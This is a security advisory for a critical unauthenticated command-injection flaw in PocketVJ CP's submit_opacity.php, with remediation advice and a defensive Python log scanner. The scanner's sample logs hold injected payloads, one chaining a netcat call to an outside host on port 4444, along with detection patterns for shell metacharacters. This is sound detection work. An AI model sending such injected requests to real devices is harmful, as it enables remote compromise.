CVE-2025-63334

PocketVJ · PocketVJ CP Multiple Products

A critical vulnerability has been discovered in multiple PocketVJ CP products, allowing an unauthenticated attacker to execute arbitrary code remotely.

Executive summary

PocketVJ CP products contain an unauthenticated remote code execution flaw, tracked as CVE-2025-63334 and scored CVSS 9.8, that lets an attacker take complete control of an affected device without any credentials. Successful exploitation can lead to service disruption, data theft, and further attacks on the internal network.

Vulnerability

This is an unauthenticated remote code execution (RCE) vulnerability in the submit_opacity.php component. The root cause is that the script does not properly sanitize user-supplied input (e.g., the opacity value) before incorporating it into an operating system command. An unauthenticated attacker can send a crafted HTTP request to the endpoint with shell commands embedded in the parameter; those commands run on the underlying operating system with the privileges of the web server process, giving the attacker full control of the device.

Business impact

This vulnerability is rated critical (CVSS 9.8). Exploitation leads to complete compromise of the affected PocketVJ systems. The potential business impact includes disruption of the services controlled by the device, unauthorized access to and exfiltration of sensitive data, and modification of system configuration. A compromised device can also serve as a pivot point for attacks against other systems on the organization's internal network, potentially leading to a wider breach, reputational damage, and significant recovery costs.

Remediation

Immediate Action: Update all affected PocketVJ CP products to the patched version published by the vendor. After patching, review system and web server access logs for earlier exploitation attempts against the vulnerable component: a device that was compromised before the patch remains compromised after it, and the patch does not remove an attacker's existing foothold.

Proactive Monitoring: Scrutinize web server access logs for requests to submit_opacity.php whose parameters carry command injection signatures: shell metacharacters such as ;, |, &, backticks and $( ), including their URL-encoded forms (%3B, %7C, %26). Monitor for anomalous outbound network connections from PocketVJ devices, which can indicate a successful compromise (a reverse shell or the download of a second-stage payload). System-level monitoring should detect unexpected processes spawned by the web server user, file modifications, or unauthorized user accounts.
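The log review described above, as an added example that is not part of the original advisory or the vendor's tooling: a small Python scanner that parses combined-format access log lines, picks out requests to submit_opacity.php, URL-decodes each parameter (including double-encoded values) and flags shell metacharacters. The log lines are constructed for illustration; the assumption that a legitimate opacity value is an integer from 0 to 100 is hypothetical, since the product's accepted format is not documented here.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

TARGET_SCRIPT = "submit_opacity.php"

# Constructed sample lines in Apache/nginx "combined" format. These are
# illustrative only and were not taken from any real PocketVJ device.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Nov/2025:08:01:12 +0000] "GET /submit_opacity.php?opacity=80 HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Nov/2025:08:01:40 +0000] "GET /submit_opacity.php?opacity=80%3Bid HTTP/1.1" 200 231 "-" "curl/8.4.0"
198.51.100.23 - - [10/Nov/2025:08:02:03 +0000] "GET /submit_opacity.php?opacity=1%7Cnc%20198.51.100.23%204444 HTTP/1.1" 200 0 "-" "python-requests/2.31"
203.0.113.7 - - [10/Nov/2025:08:02:30 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Nov/2025:08:03:11 +0000] "POST /submit_opacity.php HTTP/1.1" 200 0 "-" "curl/8.4.0"
"""

# Combined log format: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Characters and sequences that let a value break out of a shell command.
SHELL_META_RE = re.compile(r"[;&|`<>\n]|\$[({]")

# Hypothetical allowlist for a legitimate opacity value: an integer 0-100.
OPACITY_OK_RE = re.compile(r"^(?:100|\d{1,2})$")


def decoded_forms(value):
    """Yield the value as received, then URL-decoded once and twice more,
    so encoded or double-encoded metacharacters are still caught."""
    seen = set()
    current = value
    for _ in range(3):
        if current not in seen:
            seen.add(current)
            yield current
        current = unquote_plus(current)


def classify_request(method, target):
    """Return (severity, reason) for one request line, or None when the
    request does not look like an attempt against submit_opacity.php."""
    parts = urlsplit(target)
    if not (parts.path == TARGET_SCRIPT or parts.path.endswith("/" + TARGET_SCRIPT)):
        return None
    # parse_qsl already applies one round of URL decoding to each value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for form in decoded_forms(value):
            if SHELL_META_RE.search(form):
                return ("high", f"shell metacharacter in parameter {name!r}: {form!r}")
        if name == "opacity" and not OPACITY_OK_RE.match(value):
            return ("medium", f"non-numeric opacity value: {value!r}")
    if method == "POST":
        # Request bodies are not written to access logs; a POST to the
        # endpoint can only be judged from a WAF or proxy capture.
        return ("info", "POST to endpoint; body not in access log, check WAF/proxy capture")
    return None


def analyze(log_text):
    """Scan a block of access log text and return a list of findings."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        verdict = classify_request(m["method"], m["target"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "severity": verdict[0], "reason": verdict[1]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} [{f['severity']}] {f['reason']} (HTTP {f['status']})")
```

Run against the constructed sample, the scanner flags the two GET requests carrying an encoded ; and | in the opacity parameter as high, notes the POST as unclassifiable from the access log alone, and ignores the benign opacity=80 request and the unrelated index.php hit. Pair it with the HTTP status and response size: a 200 with an unusually large body on an injected request is a stronger signal than the request alone.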

Compensating Controls: If immediate patching is not feasible, implement the following controls to reduce risk:

  • Restrict network access to the device's web interface (at minimum the submit_opacity.php endpoint) to a limited set of trusted administrative IP addresses, and do not expose the interface to the internet.
  • Deploy a Web Application Firewall (WAF) with rules that detect and block command injection patterns. Treat this as a stopgap, not a fix: encoding and whitespace tricks can evade signature-based rules.
  • Segment the network to isolate PocketVJ devices from critical business systems, limiting the potential impact of a compromise.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the critical severity (CVSS 9.8) of this unauthenticated remote code execution vulnerability, immediate action is required. Organizations using affected PocketVJ CP products should apply the vendor-supplied updates to all vulnerable systems without delay. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog and no public exploit is known, but its impact and low exploitation effort (a single unauthenticated HTTP request) make it a likely candidate for future inclusion. Treat it as an active threat and implement the remediation and monitoring steps above.